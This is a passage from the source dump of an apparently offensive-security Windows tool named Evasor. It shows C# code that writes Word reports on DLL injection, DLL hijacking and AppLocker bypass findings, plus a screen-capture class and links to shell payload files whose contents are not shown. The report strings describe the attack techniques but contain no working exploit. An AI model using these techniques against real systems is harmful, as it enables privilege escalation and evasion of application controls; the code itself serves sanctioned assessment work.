29 | • The reflective loader function will try to find the Process Environment Block (PEB) of the target process using the appropriate CPU register and from that will try to find the address in memory of kernel32dll and any other required libraries.
30 | • Discovery of the memory addresses of required API functions such as LoadLibraryA, GetProcAddress, and VirtualAlloc. The functions above will be used to properly load the DLL into memory and call its entry point DllMain which will execute the DLL.
31 | ";
32 | Refrences = @"https://pentestlab.blog/2017/04/04/dll-injection/";
33 | foreach (string app in i_Results)
34 | {
35 | string[] subPaths = app.Split('^');
36 | apps += subPaths[0] + " Owner:" + subPaths[2] + "\r\n";
37 | }
38 |
39 | for (int i = 0; i < i_Pocs.Count; i++)
40 | {
41 | pocs_and_pic += i_Pocs[i] + "\r\n" + i_Pics[i] + "\r\n";
42 | }
43 |
44 | Issues = @"We had found that we can inject DLL's to the following Process:" + "\r\n" + apps;
45 | Recommendations_for_mitigation = "None";
46 | Proof_of_Concept = "Conducted at " + DateTime.Now.ToString() + " -As you can see typing at the RUN text-box the following Proof of concept will result with process being DLL injected to them. \r\n" + pocs_and_pic;
47 | create_word_report(Technical_Details, Issues, Refrences, Recommendations_for_mitigation, Proof_of_Concept, i_Pics, "3.DLL injection", "3");
48 | ResetArguments();
49 | }
50 |
51 | public static void Scan_For_Executibles_That_Can_Bypass_Windows_AppControl(List i_Results, List i_Pocs, List i_Pics)
52 | {
53 | Technical_Details = @"The goal of this test is to check the most common techniques to bypass AppControl restrictions and block rules. This test contains a complete list of all known bypasses. Since AppControl rules can be configured in different ways it makes sense to check them all.";
54 | Refrences = @"https://github.com/milkdevil/UltimateAppLockerByPassList";
55 | foreach (string app in i_Results)
56 | {
57 | apps += app + "\r\n";
58 | }
59 | for (int i = 0; i < i_Pocs.Count; i++)
60 | {
61 | pocs_and_pic += i_Pocs[i] + "\r\n" + i_Pics[i] + "\r\n";
62 | }
63 | Issues = @"We had found that we can execute the following applications which can be used to bypass windows AppControl restriction block applications:" + "\r\n" + apps;
64 | Recommendations_for_mitigation = "Configure the OS not to allow running those applications!!!";
65 | Proof_of_Concept = "Conducted at " + DateTime.Now.ToString() + "- As you can see typing at the RUN text-box the following Proof of concept will bypass AppControl restricted rules. \r\n" + pocs_and_pic;
66 | create_word_report(Technical_Details, Issues, Refrences, Recommendations_for_mitigation, Proof_of_Concept, i_Pics, "1.AppControl restriction rules bypass", "1");
67 | ResetArguments();
68 | }
69 |
70 | public static void Scan_for_Process_vulnerable_to_DLL_hijack_DLL_replacement(List i_Results1, List i_Results2, List i_Pocs, List i_Pics)
71 | {
72 | Technical_Details = @"In Windows environments when an application or a service is starting it looks for a number of DLL’s in order to function properly. If these DLL’s doesn’t exist or are implemented in an insecure way (DLL’s are called without using a fully qualified path) then it is possible to escalate privileges by forcing the application to load and execute a malicious DLL file. It should be noted that when an application needs to load a DLL it will go through the following order:
73 | The directory from which the application is loaded
74 | C:\Windows\System32
75 | C:\Windows\System
76 | C:\Windows
77 | The current working directory
78 | Directories in the system PATH environment variable Directories in the user PATH environment variable.
79 | ";
80 | Refrences = @"https://pentestlab.blog/2017/03/27/dll-hijacking/";
81 | foreach (string app in i_Results1)
82 | {
83 | string[] subPaths = app.Split('^');
84 | apps_h += subPaths[1] + "\r\n";
85 | }
86 | foreach (string app in i_Results2)
87 | {
88 | string[] subPaths = app.Split('^');
89 | apps_r += subPaths[1] + "\r\n";
90 | }
91 | for (int i = 0; i < i_Pocs.Count; i++)
92 | {
93 | pocs_and_pic += i_Pocs[i] + "\r\n" + i_Pics[i] + "\r\n";
94 | }
95 | Issues = @"We had found that we can hijack/replace the following DLL’s:" + "\r\n" + apps_h + "\r\n" + apps_r;
96 | Recommendations_for_mitigation = "None!!!";
97 | Proof_of_Concept = "Conducted at " + DateTime.Now.ToString() + " -As you can see, making the following will result with DLL Hijack attack.\r\n" + pocs_and_pic;
98 | create_word_report(Technical_Details, Issues, Refrences, Recommendations_for_mitigation, Proof_of_Concept, i_Pics, "2.DLL Hijacking", "2");
99 | ResetArguments();
100 | }
101 |
102 | public static void Scan_for_resource_hijacking_files()
103 | {
104 | Technical_Details = @"In this test we search for files on all the disk that can be abuesd in order to gain privlige eascalation by examining the content of all xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,mui,msi,yaml,lib,inf files exists on the disk and checks if it contains paths to other xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,mui,msi,yaml,lib,inf files and checks if there are premonitions to edit the file, by that it can hijack the resource and gain privlige escalation.";
105 | Refrences = "None.";
106 | }
107 |
108 | public static void ResetArguments()
109 | {
110 | Technical_Details = string.Empty;
111 | Issues = string.Empty;
112 | Recommendations_for_mitigation = string.Empty;
113 | Refrences = string.Empty;
114 | Proof_of_Concept = string.Empty;
115 | apps = string.Empty;
116 | apps_h = string.Empty;
117 | apps_r = string.Empty;
118 | pocs_and_pic = string.Empty;
119 | }
120 |
121 |
122 | public static void Merge(string[] filesToMerge, string outputFilename, bool insertPageBreaks)
123 | {
124 | //object defaultTemplate = documentTemplate;
125 | object missing = System.Type.Missing;
126 | object pageBreak = Microsoft.Office.Interop.Word.WdBreakType.wdSectionBreakNextPage;
127 | object outputFile = outputFilename;
128 |
129 | // Create a new Word application
130 | Microsoft.Office.Interop.Word._Application wordApplication = new Microsoft.Office.Interop.Word.Application();
131 |
132 | try
133 | {
134 | // Create a new file based on our template
135 | Microsoft.Office.Interop.Word.Document wordDocument = wordApplication.Documents.Add(
136 | ref missing
137 | , ref missing
138 | , ref missing
139 | , ref missing);
140 |
141 | // Make a Word selection object.
142 | Microsoft.Office.Interop.Word.Selection selection = wordApplication.Selection;
143 |
144 | //Count the number of documents to insert;
145 | int documentCount = filesToMerge.Length;
146 |
147 | //A counter that signals that we shoudn't insert a page break at the end of document.
148 | int breakStop = 0;
149 |
150 | // Loop thru each of the Word documents
151 | foreach (string file in filesToMerge)
152 | {
153 | breakStop++;
154 | // Insert the files to our template
155 | selection.InsertFile(
156 | file
157 | , ref missing
158 | , ref missing
159 | , ref missing
160 | , ref missing);
161 |
162 | //Do we want page breaks added after each documents?
163 | if (insertPageBreaks && breakStop != documentCount)
164 | {
165 | selection.InsertBreak(ref pageBreak);
166 | }
167 | }
168 |
169 | // Save the document to it's output file.
170 | wordDocument.SaveAs(
171 | ref outputFile
172 | , ref missing
173 | , ref missing
174 | , ref missing
175 | , ref missing
176 | , ref missing
177 | , ref missing
178 | , ref missing
179 | , ref missing
180 | , ref missing
181 | , ref missing
182 | , ref missing
183 | , ref missing
184 | , ref missing
185 | , ref missing
186 | , ref missing);
187 |
188 | // Clean up!
189 | wordDocument = null;
190 | }
191 | catch (Exception ex)
192 | {
193 | //I didn't include a default error handler so i'm just throwing the error
194 | throw ex;
195 | }
196 | finally
197 | {
198 | // Finally, Close our Word application
199 | wordApplication.Quit(ref missing, ref missing, ref missing);
200 | }
201 | }
202 |
203 |
204 | public static void create_word_report(string i_Technical_Details, string i_Issues, string i_References, string i_Recommendations_for_mitigation, string i_Proof_of_Concept, List i_pic, string vector, string test_number)
205 | {
206 | try
207 | {
208 | //Create an instance for word app
209 | Microsoft.Office.Interop.Word.Application winword = new Microsoft.Office.Interop.Word.Application();
210 | //Set animation status for word application
211 | winword.ShowAnimation = false;
212 | //Set status for word application is to be visible or not.
213 | winword.Visible = false;
214 | //Create a missing variable for missing value
215 | object missing = System.Reflection.Missing.Value;
216 | //Create a new document
217 | Microsoft.Office.Interop.Word.Document document = winword.Documents.Add(ref missing, ref missing, ref missing, ref missing);
218 | //Add header into the document
219 | foreach (Microsoft.Office.Interop.Word.Section section in document.Sections)
220 | {
221 | //Get the header range and add the header details.
222 | Microsoft.Office.Interop.Word.Range headerRange = section.Headers[Microsoft.Office.Interop.Word.WdHeaderFooterIndex.wdHeaderFooterPrimary].Range;
223 | headerRange.Fields.Add(headerRange, Microsoft.Office.Interop.Word.WdFieldType.wdFieldPage);
224 | headerRange.ParagraphFormat.Alignment = Microsoft.Office.Interop.Word.WdParagraphAlignment.wdAlignParagraphCenter;
225 | headerRange.Font.ColorIndex = Microsoft.Office.Interop.Word.WdColorIndex.wdGray25;
226 | headerRange.Font.Size = 10;
227 | headerRange.Text = "-Confidential-";
228 | }
229 |
230 | string style = "Normal";
231 | object objstyle = style;
232 |
233 | //Add paragraph with Heading 1 style
234 | Microsoft.Office.Interop.Word.Paragraph para1 = document.Content.Paragraphs.Add(ref missing);
235 | object styleHeading1 = "Heading 1";
236 | para1.Range.set_Style(ref styleHeading1);
237 | para1.Range.Text = vector;
238 | para1.Range.InsertParagraphAfter();
239 | Microsoft.Office.Interop.Word.Range r1 = para1.Range;
240 | r1.set_Style(ref objstyle);
241 |
242 | //Add paragraph with Heading 1 style
243 | Microsoft.Office.Interop.Word.Paragraph para2 = document.Content.Paragraphs.Add(ref missing);
244 | object styleHeading2 = "Heading 2";
245 | para2.Range.set_Style(ref styleHeading2);
246 | para2.Range.Text = "Overall Risk Level:";
247 | para2.Range.InsertParagraphAfter();
248 | Microsoft.Office.Interop.Word.Range r2 = para2.Range;
249 | r2.set_Style(ref objstyle);
250 | r2.Text = "";
251 |
252 | //Add paragraph with Heading 1 style
253 | Microsoft.Office.Interop.Word.Paragraph para3 = document.Content.Paragraphs.Add(ref missing);
254 | object styleHeading3 = "Heading 4";
255 | para3.Range.set_Style(ref styleHeading3);
256 | para3.Range.Text = "Technical Details:";
257 | para3.Range.InsertParagraphAfter();
258 | Microsoft.Office.Interop.Word.Range r3 = para3.Range;
259 | r3.set_Style(ref objstyle);
260 | r3.Text = i_Technical_Details;
261 | r3.InsertParagraphAfter();
262 |
263 |
264 | //Add paragraph with Heading 2 style
265 | Microsoft.Office.Interop.Word.Paragraph para4 = document.Content.Paragraphs.Add(ref missing);
266 | object styleHeading4 = "Heading 4";
267 | para4.Range.set_Style(ref styleHeading4);
268 | para4.Range.Text = "Issues:";
269 | para4.Range.InsertParagraphAfter();
270 | Microsoft.Office.Interop.Word.Range r4 = para4.Range;
271 | r4.set_Style(ref objstyle);
272 | r4.Text = i_Issues;
273 | r4.InsertParagraphAfter();
274 |
275 |
276 | //Add paragraph with Heading 1 style
277 | Microsoft.Office.Interop.Word.Paragraph para5 = document.Content.Paragraphs.Add(ref missing);
278 | object styleHeading5 = "Heading 4";
279 | para5.Range.set_Style(ref styleHeading5);
280 | para5.Range.Text = "References:";
281 | para5.Range.InsertParagraphAfter();
282 | Microsoft.Office.Interop.Word.Range r5 = para5.Range;
283 | r5.set_Style(ref objstyle);
284 | r5.Text = i_References;
285 | r5.InsertParagraphAfter();
286 |
287 | //Add paragraph with Heading 1 style
288 | Microsoft.Office.Interop.Word.Paragraph para6 = document.Content.Paragraphs.Add(ref missing);
289 | object styleHeading6 = "Heading 4";
290 | para6.Range.set_Style(ref styleHeading6);
291 | para6.Range.Text = "Recommendations for mitigation:";
292 | para6.Range.InsertParagraphAfter();
293 | Microsoft.Office.Interop.Word.Range r6 = para6.Range;
294 | r6.set_Style(ref objstyle);
295 | r6.Text = i_Recommendations_for_mitigation;
296 | r6.InsertParagraphAfter();
297 |
298 | //Add paragraph with Heading 1 style
299 | Microsoft.Office.Interop.Word.Paragraph para7 = document.Content.Paragraphs.Add(ref missing);
300 | object styleHeading7 = "Heading 4";
301 | para7.Range.set_Style(ref styleHeading7);
302 | para7.Range.Text = "Proof of Concept:";
303 | para7.Range.InsertParagraphAfter();
304 | Microsoft.Office.Interop.Word.Range r7 = para7.Range;
305 | r7.set_Style(ref objstyle);
306 | r7.Text = i_Proof_of_Concept;
307 | r7.InsertParagraphAfter();
308 |
309 | for (int i = i_pic.Count - 1; 0 <= i; i--)
310 | {
311 | string fileName = i_pic[i]; //the picture file to be inserted
312 | Object oMissed = para5.Range; //the position you want to insert
313 | Object oLinkToFile = false; //default
314 | Object oSaveWithDocument = true;//default
315 | document.InlineShapes.AddPicture(fileName, ref oLinkToFile, ref oSaveWithDocument, ref oMissed);
316 | }
317 | //Save the document
318 | object filename = Path.GetDirectoryName(Path.GetFullPath(Process.GetCurrentProcess().ProcessName + ".exe")) + @"\TEMP\"+ Process.GetCurrentProcess().ProcessName + "-" + test_number + "-Report.docx";
319 | document.SaveAs2(ref filename);
320 | document.Close(ref missing, ref missing, ref missing);
321 | document = null;
322 | winword.Quit(ref missing, ref missing, ref missing);
323 | winword = null;
324 | }
325 | catch (Exception ex)
326 | { }
327 | }
328 |
329 |
330 | }
331 | }
332 |
--------------------------------------------------------------------------------
/Evasor/ScreenCapture.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Drawing;
4 | using System.Linq;
5 | using System.Runtime.InteropServices;
6 | using System.Text;
7 | using System.Threading.Tasks;
8 |
9 | namespace Evasor
10 | {
11 | public class ScreenCapture
12 | {
13 | [DllImport("user32.dll")]
14 | private static extern IntPtr GetForegroundWindow();
15 |
16 | [DllImport("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]
17 | public static extern IntPtr GetDesktopWindow();
18 |
19 | [StructLayout(LayoutKind.Sequential)]
20 | private struct Rect
21 | {
22 | public int Left;
23 | public int Top;
24 | public int Right;
25 | public int Bottom;
26 | }
27 |
28 | [DllImport("user32.dll")]
29 | private static extern IntPtr GetWindowRect(IntPtr hWnd, ref Rect rect);
30 |
31 | public static Image CaptureDesktop()
32 | {
33 | return CaptureWindow(GetDesktopWindow());
34 | }
35 |
36 | public static Bitmap CaptureActiveWindow()
37 | {
38 | return CaptureWindow(GetForegroundWindow());
39 | }
40 |
41 | public static Bitmap CaptureWindow(IntPtr handle)
42 | {
43 | var rect = new Rect();
44 | GetWindowRect(handle, ref rect);
45 | var bounds = new Rectangle(rect.Left, rect.Top, rect.Right - rect.Left, rect.Bottom - rect.Top);
46 | var result = new Bitmap(bounds.Width, bounds.Height);
47 |
48 | using (var graphics = Graphics.FromImage(result))
49 | {
50 | graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);
51 | }
52 |
53 | return result;
54 | }
55 | }
56 | }
57 |
--------------------------------------------------------------------------------
/Evasor/bin/Debug/DLLs/Shady.inf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shady.inf
--------------------------------------------------------------------------------
/Evasor/bin/Debug/DLLs/Shell.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.cs
--------------------------------------------------------------------------------
/Evasor/bin/Debug/DLLs/Shell.csproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.csproj
--------------------------------------------------------------------------------
/Evasor/bin/Debug/DLLs/Shell.fsscript:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.fsscript
--------------------------------------------------------------------------------
/Evasor/bin/Debug/DLLs/Shell.hta:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.hta
--------------------------------------------------------------------------------
/Evasor/bin/Debug/DLLs/Shell.inf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.inf
--------------------------------------------------------------------------------
/Evasor/bin/Debug/DLLs/Shell.rsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.rsp
--------------------------------------------------------------------------------
/Evasor/bin/Debug/DLLs/Shell.sct:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.sct
--------------------------------------------------------------------------------
/Evasor/bin/Debug/DLLs/Shell.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.txt
--------------------------------------------------------------------------------
/Evasor/bin/Debug/DLLs/Shell.vbs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/DLLs/Shell.vbs
--------------------------------------------------------------------------------
/Evasor/bin/Debug/Evasor.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
--------------------------------------------------------------------------------
/Evasor/bin/Debug/Evasor.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/Evasor.pdb
--------------------------------------------------------------------------------
/Evasor/bin/Debug/REPORT/Evasor-Report.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/REPORT/Evasor-Report.docx
--------------------------------------------------------------------------------
/Evasor/bin/Debug/TEMP/Evasor-0-Report.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/TEMP/Evasor-0-Report.docx
--------------------------------------------------------------------------------
/Evasor/bin/Debug/TEMP/Evasor-1-Report.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/TEMP/Evasor-1-Report.docx
--------------------------------------------------------------------------------
/Evasor/bin/Debug/TEMP/Evasor-2-Report.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/TEMP/Evasor-2-Report.docx
--------------------------------------------------------------------------------
/Evasor/bin/Debug/TEMP/Evasor-3-Report.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/TEMP/Evasor-3-Report.docx
--------------------------------------------------------------------------------
/Evasor/bin/Debug/TEMP/Evasor-4-Report.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/TEMP/Evasor-4-Report.docx
--------------------------------------------------------------------------------
/Evasor/bin/Debug/TEMP/~$nd0rArk-3-Report.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/bin/Debug/TEMP/~$nd0rArk-3-Report.docx
--------------------------------------------------------------------------------
/Evasor/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/Evasor/obj/Debug/Evasor.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/Evasor/obj/Debug/Evasor.csproj.CopyComplete
--------------------------------------------------------------------------------
/Evasor/obj/Debug/Evasor.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 44b4d2b0e8e951dd6dc71fe16a5f85801b362121
2 |
--------------------------------------------------------------------------------
/Evasor/obj/Debug/Evasor.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | C:\Users\arik\Desktop\Evasor\Evasor\obj\Debug\Evasor.csprojAssemblyReference.cache
2 | C:\Users\arik\Desktop\Evasor\Evasor\obj\Debug\Evasor.csproj.CoreCompileInputs.cache
3 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\Evasor.exe.config
4 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\Evasor.exe
5 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\Evasor.pdb
6 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\Microsoft.Win32.Primitives.dll
7 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\netstandard.dll
8 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.AppContext.dll
9 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Collections.Concurrent.dll
10 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Collections.dll
11 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Collections.NonGeneric.dll
12 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Collections.Specialized.dll
13 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.ComponentModel.dll
14 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.ComponentModel.EventBasedAsync.dll
15 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.ComponentModel.Primitives.dll
16 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.ComponentModel.TypeConverter.dll
17 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Console.dll
18 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Data.Common.dll
19 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.Contracts.dll
20 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.Debug.dll
21 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.FileVersionInfo.dll
22 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.Process.dll
23 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.StackTrace.dll
24 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.TextWriterTraceListener.dll
25 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.Tools.dll
26 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.TraceSource.dll
27 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Diagnostics.Tracing.dll
28 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Drawing.Primitives.dll
29 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Dynamic.Runtime.dll
30 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Globalization.Calendars.dll
31 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Globalization.dll
32 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Globalization.Extensions.dll
33 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.Compression.dll
34 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.Compression.ZipFile.dll
35 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.dll
36 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.FileSystem.dll
37 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.FileSystem.DriveInfo.dll
38 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.FileSystem.Primitives.dll
39 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.FileSystem.Watcher.dll
40 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.IsolatedStorage.dll
41 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.MemoryMappedFiles.dll
42 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.Pipes.dll
43 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.IO.UnmanagedMemoryStream.dll
44 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Linq.dll
45 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Linq.Expressions.dll
46 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Linq.Parallel.dll
47 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Linq.Queryable.dll
48 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.Http.dll
49 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.NameResolution.dll
50 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.NetworkInformation.dll
51 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.Ping.dll
52 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.Primitives.dll
53 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.Requests.dll
54 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.Security.dll
55 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.Sockets.dll
56 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.WebHeaderCollection.dll
57 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.WebSockets.Client.dll
58 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Net.WebSockets.dll
59 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.ObjectModel.dll
60 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Reflection.dll
61 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Reflection.Extensions.dll
62 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Reflection.Primitives.dll
63 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Resources.Reader.dll
64 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Resources.ResourceManager.dll
65 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Resources.Writer.dll
66 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.CompilerServices.VisualC.dll
67 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.dll
68 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Extensions.dll
69 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Handles.dll
70 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.InteropServices.dll
71 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.InteropServices.RuntimeInformation.dll
72 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Numerics.dll
73 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Serialization.Formatters.dll
74 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Serialization.Json.dll
75 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Serialization.Primitives.dll
76 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Runtime.Serialization.Xml.dll
77 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Claims.dll
78 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Cryptography.Algorithms.dll
79 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Cryptography.Csp.dll
80 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Cryptography.Encoding.dll
81 | C:\Users\arik\Desktop\Evasor\Evasor\bin\Debug\System.Security.Cryptography.Primitives.dll
